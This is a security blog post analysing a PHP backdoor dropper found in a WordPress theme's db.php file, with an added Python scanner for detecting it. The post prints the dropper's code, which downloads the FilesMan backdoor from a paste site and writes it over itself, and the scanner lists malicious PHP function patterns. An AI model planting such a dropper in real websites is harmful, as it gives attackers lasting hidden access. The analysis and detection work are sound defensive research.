Sucuri Blog

Backdoor Uses Paste Site to Host Payload

September 18, 2018, by Bruno Zanelato

Finding backdoors is one of the biggest challenges for a website security analyst, because backdoors are designed to stay hidden so that the attacker keeps access even after the visible malware is found and removed.

Website Backdoors

A backdoor is a piece of malware that attackers leave behind to allow them access back into a website. Hackers like to inject code into different locations to increase their chances of retaining control of the website so they can reinfect it continuously.

Over the years, we have written a lot about ways to decode complex malware built around common PHP functions like:

  • eval,
  • create_function,
  • preg_replace,
  • assert,
  • base64_decode.

According to our latest website hacked report, over the course of the previous year:

71% of all compromises had a PHP-based backdoor hidden within the site.

These backdoors are effective because they evade most website scanning technologies.

We have written many posts on backdoors and their effects. Today, we want to discuss a technique that uses none of the usual obfuscation tricks, such as encrypted strings, string concatenation, and typecasting.

Unusual Backdoors

These unusual backdoors often look like legitimate code and can go unnoticed by most malware scanners available in the market.

During an incident response investigation, we detected an interesting backdoor that was small, simple and effective.

The backdoor was uploaded as the wp-content/themes/buildup/db.php file and looked like this:

    <?php
    if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {
        echo "Copy_success";
    } else {
        echo "Copy_failed";
    }
    ?>

This small piece of code downloads the full malware from hxxps://paste[.]ee (if you are not familiar with this site, it is like Pastebin with SSL and fewer controls), then writes it over its own db.php file.

The downloaded code had been obfuscated with a free online tool, which is common among malware developers; we also see legitimate code processed by the same tools.

[Image: Obfuscated code that downloads malware from a website]

Note to developers: be careful with free online obfuscation tools, because they may keep a copy of your code.

And here’s the more “readable” code:

[Image: Code that downloads malware from a website]

And, as you may have noticed, this is a copy of the FilesMan backdoor, which is usually hidden in the filesystem, making it hard to find without access to the server or its logs. Here, a tiny file simply downloads the backdoor on demand, and an untrained eye may overlook it.
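A simple static check for this dropper pattern, as an added example that is not Sucuri's code: it flags PHP files that copy or read a remote URL into the site (high confidence), and reports the execution and decoding functions listed earlier at lower confidence. The sample file and its URL are constructed to mirror the db.php above.

```python
import re
import sys
from pathlib import Path

# High-confidence rule: a fetch/write primitive whose *source* argument is a remote URL,
# exactly what the db.php dropper does. (copy() and file_get_contents() can only reach
# http(s) URLs when allow_url_fopen is enabled, so disabling it blocks this dropper.)
REMOTE_SOURCE_RE = re.compile(
    r"@?\b(copy|file_get_contents|fopen|readfile)\s*\(\s*['\"]"
    r"(?:hxx|htt)ps?://[^'\"]+['\"]",
    re.IGNORECASE,
)
# Lower-confidence rule: the execution/decoding functions the post lists, plus
# preg_replace with the /e modifier, which evaluates its replacement as PHP.
SUSPECT_CALL_RE = re.compile(
    r"\b(eval|create_function|assert|base64_decode)\s*\("
    r"|preg_replace\s*\(\s*['\"]\S*?/[a-z]*e[a-z]*['\"]",
    re.IGNORECASE,
)

def scan_php_source(source: str, path: str = "<inline>") -> list:
    """Return (path, line_no, severity, code) findings for one PHP file's text."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if REMOTE_SOURCE_RE.search(line):
            findings.append((path, no, "high", line.strip()))
        elif SUSPECT_CALL_RE.search(line):
            findings.append((path, no, "medium", line.strip()))
    return findings

def scan_tree(root: Path) -> list:
    """Scan every .php file under root (for example wp-content/themes)."""
    out = []
    for p in root.rglob("*.php"):
        out.extend(scan_php_source(p.read_text(errors="replace"), str(p)))
    return out

# Constructed sample mirroring the dropper in the post; the URL is a placeholder.
SAMPLE_DB_PHP = """<?php
if ( @copy('https://paste.invalid/r/abc123/0', 'db.php') ) {
    echo "Copy_success";
} else {
    echo "Copy_failed";
}
?>"""

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = scan_tree(Path(target)) if target else scan_php_source(SAMPLE_DB_PHP, "db.php")
    for path, no, sev, code in results:
        print(f"[{sev}] {path}:{no}: {code}")
```

Run it with a directory argument to scan a real theme or plugin tree; without one it scans the embedded sample.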

How to Avoid Website Backdoors

Backdoors can be very hard to find and even harder to get rid of. To begin, it is highly advisable that you monitor your logs constantly for unexpected behavior.

In order to prevent the website from getting infected in the first place, we highly recommend implementing security measures like file integrity monitoring and a Website Application Firewall (WAF).

If you suspect that your website is infected with a backdoor, we have an experienced website security team that can clean up your website. If you are looking for a DIY solution, we have written a guide explaining How to Clean a Hacked Website.

Categories: Website Malware Infections, Website Security, WordPress Security
Tags: Black Hat Tactics, Website Backdoor, WordPress Plugins and Themes

About Bruno Zanelato

Bruno Zanelato is Sucuri's Copywriter who joined the company in 2014. As Eng - System III, working for the SOC team since 2019, his main responsibilities cover firewalls, IDS, IPS, HIDS, WAF, log management, system hardening, PCI compliance, IDS/IPS signatures and Linux/BSD hardening, as well as developing content to highlight Sucuri's products and services and to educate the public about website security. Bruno's professional experience covers more than 15 years of deploying and managing Web Application Firewalls as well as open-source security software. When Bruno isn't drafting blog posts or writing web pages, you might find him online playing MMORPG games, watching MMA, and having fun with his kids and family in his free time. Connect with him on LinkedIn.
